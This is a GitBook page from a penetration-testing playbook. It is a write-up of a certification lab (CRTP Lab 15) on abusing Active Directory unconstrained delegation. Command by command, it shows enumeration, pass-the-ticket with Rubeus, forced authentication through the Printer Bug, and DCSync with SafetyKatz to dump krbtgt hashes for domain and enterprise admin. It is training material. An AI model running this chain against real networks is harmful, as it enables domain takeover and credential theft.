PenTest Playbook
  • Welcome!
  • Web App Pentesting
    • SQL Injection
    • NoSQL Injection
    • XSS
    • CSRF
    • SSRF
    • XXE
    • IDOR
    • SSTI
    • Broken Access Control/Privilege Escalation
    • Open Redirect
    • File Inclusion
    • File Upload
    • Insecure Deserialization
      • XMLDecoder
    • LDAP Injection
    • XPath Injection
    • JWT
    • Parameter Pollution
    • Prototype Pollution
    • Race Conditions
    • CRLF Injection
    • LaTeX Injection
    • CORS Misconfiguration
    • Handy Commands & Payloads
  • Active Directory Pentest
    • Domain Enumeration
      • User Enumeration
      • Group Enumeration
      • GPO & OU Enumeration
      • ACLs
      • Trusts
      • User Hunting
    • Domain Privilege Escalation
      • Kerberoast
        • AS-REP Roast (Kerberoasting)
        • CRTP Lab 14
      • Targeted Kerberoasting
        • AS-REP Roast
        • Set SPN
      • Kerberos Delegation
        • Unconstrained Delegation
          • CRTP Lab 15
        • Constrained Delegation
          • CRTP Lab 16
        • Resource Based Constrained Delegation (RBCD)
          • CRTP Lab 17
      • Across Trusts
        • Child to Parent (Cross Domain)
          • Using Trust Tickets
            • CRTP Lab 18
          • Using KRBTGT Hash
            • CRTP Lab 19
        • Cross Forest
          • Lab 20
        • AD CS (Across Domain Trusts)
          • ESC1
            • CRTP Lab 21
        • Trust Abuse - MSSQL Servers
          • CRTP Lab 22
    • Lateral Movement
      • PowerShell Remoting
      • Extracting Creds, Hashes, Tickets
      • Over-PassTheHash
      • DCSync
    • Evasion
      • Evasion Cheetsheet
    • Persistence
      • Golden Ticket
        • CRTP Lab 8
      • Silver Ticket
        • CRTP Lab 9
      • Diamond Ticket
        • CRTP Lab 10
      • Skeleton Key
      • DSRM
        • CRTP Lab 11
      • Custom SSP
      • Using ACLs
        • AdminSDHolder
        • Rights Abuse
          • CRTP Lab 12
        • Security Descriptors
          • CRTP Lab 13
    • Tools
    • PowerShell
  • AI Security
    • LLM Security Checklist
    • GenAI Vision Security Checklist
    • Questionnaire for AI/ML/GenAI Engineering Teams
  • Network Pentesting
    • Information Gathering
    • Scanning
    • Port/Service Enumeration
      • 21 FTP
      • 22 SSH
      • 25, 465, 587 SMTP
      • 53 DNS
      • 80, 443 HTTP/s
      • 88 Kerberos
      • 135, 593 MSRPC
      • 137, 138, 139 NetBios
      • 139, 445 SMB
      • 161, 162, 10161, 10162/udp SNMP
      • 389, 636, 3268, 3269 LDAP
      • Untitled
      • Page 14
      • Page 15
      • Page 16
      • Page 17
      • Page 18
      • Page 19
      • Page 20
    • Nessus
    • Checklist
  • Mobile Pentesting
    • Android
      • Android PenTest Setup
      • Tools
    • iOS
  • DevSecOps
    • Building CI Pipeline
    • Threat Modeling
    • Secure Coding
      • Code Review Examples
        • Broken Access Control
        • Broken Authentication
        • Command Injection
        • SQLi
        • XSS
        • XXE
        • SSRF
        • SSTI
        • CSRF
        • Insecure Deserialization
        • XPath Injection
        • LDAP Injection
        • Insecure File Uploads
        • Path Traversal
        • LFI
        • RFI
        • Prototype Pollution
        • Connection String Injection
        • Sensitive Data Exposure
        • Security Misconfigurations
        • Buffer Overflow
        • Integer Overflow
        • Symlink Attack
        • Use After Free
        • Out of Bounds
      • C/C++ Secure Coding
      • Java/JS Secure Coding
      • Python Secure Coding
  • Malware Dev
    • Basics - Get detected!
    • Not so easy to stage!
    • Base64 Encode Shellcode
    • Caesar Cipher (ROT 13) Encrypt Shellcode
    • XOR Encrypt Shellcode
    • AES Encrypt Shellcode
  • Handy
    • Reverse Shells
    • Pivoting
    • File Transfers
    • Tmux
  • Wifi Pentesting
    • Monitoring
    • Cracking
  • Buffer Overflows
  • Cloud Security
    • AWS
    • GCP
    • Azure
  • Container Security
  • Todo
Powered by GitBook
On this page
  • Task 1
  • Task 2
  • Task 3
  1. Active Directory Pentest
  2. Domain Privilege Escalation
  3. Kerberos Delegation
  4. Unconstrained Delegation

CRTP Lab 15

Task 1

Find a server in the dcorp domain where Unconstrained Delegation is enabled.

Run InviShell and use PowerView to find machines with unconstrained delegation.

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\PowerView.ps1

Get-DomainComputer -Unconstrained | select -ExpandProperty name
DCORP-DC
DCORP-APPSRV

Task 2

Compromise the server and escalate to Domain Admin privileges.

To escalate to DA privileges via unconstrained delegation, we need to compromise a user that has local admin access on APPSRV.

Since we extracted secrets of appadmin, srvadmin, and websvc from dcrop-adminsrv, let's check if anyone of them has local admin privileges on dcorp-appsrv using Find-PSRemotingLocalAdminAccess.

Let's check fo appadmin.

# ArgSplit "asktgt"

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:appadmin /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

# From the new process, we try to find if the appadmin user has admin access on dcorp-appsrv

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Domain dollarcorp.moneycorp.local

dcorp-adminsrv
dcorp-appsrv

Turns out appadmin has local admin privs on appsrv.

To trick a high priv user (appadmin) to connect to a machine (dcorp-appsrv) with Unconstrained Delegation, we use Printer Bug.

Exit from the Invishell as appadmin and copy Loader to dcorp-appsrv and enabled port forwarding to run Rubeus on listener mode from attacker machine.

exit
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorpappsrv\C$\Users\Public\Loader.exe /Y

winrs -r:dcorp-appsrv cmd

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72


# ArgSplit "monitor"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe -args %Pwn% /targetuser:DCORP-DC$ /interval:5 /nowrap

To force authentication from dcorp-dc to dcorp-appsrv, we can use "MS-RPRN.exe" from student machine.

C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

With Rubeus monitoring the authentication, we get the captured TGT in base64. We can use it to Pass The Ticket with Rubeus on student VM, and then use SafetyKatz for DCSync.

From an elevated shell:

# ArgSplit "lsadump::dcsync"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /ticket:doIGRTCCBkGgAwIBBaEDAgEWooIFGjCCBRZhggUSMIIFDqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBLYwggSyoAMCARKhAwIBAqKCBKQEggSgIj7StdN


# Use SafetyKatz to run DCSync
C:\AD\Tools>Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Task 3

Escalate to Enterprise Admins privileges by abusing Printer Bug!

To escalate to Enterprise Admin, we need to force authentication from mcorp-dc.

From dcorp-appsrv, run Rubeus in monitor mode.

winrs -r:dcorp-appsrv cmd

# To trigger authentication from mcorp-dc to dcorp-appsrv, use MS-RPRN on student VM.
C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorpappsrv.dollarcorp.moneycorp.local

Copy the base64 encoded ticket and use it to Pass The Ticket with Rubeus on student VM.

# ArgSplit "ptt"
C:\Windows\system32>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /ticket:doIF1jCCBdKgAwIBBaEDAgEWooIE0TCCBM1hggTJMIIExaADAgEFoREbD01PTkVZQ09SUC5MT0NBTKIkMCKgAwIBAqEbMBk

We can now use DCSync from this process:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
PreviousUnconstrained DelegationNextConstrained Delegation

Last updated 10 months ago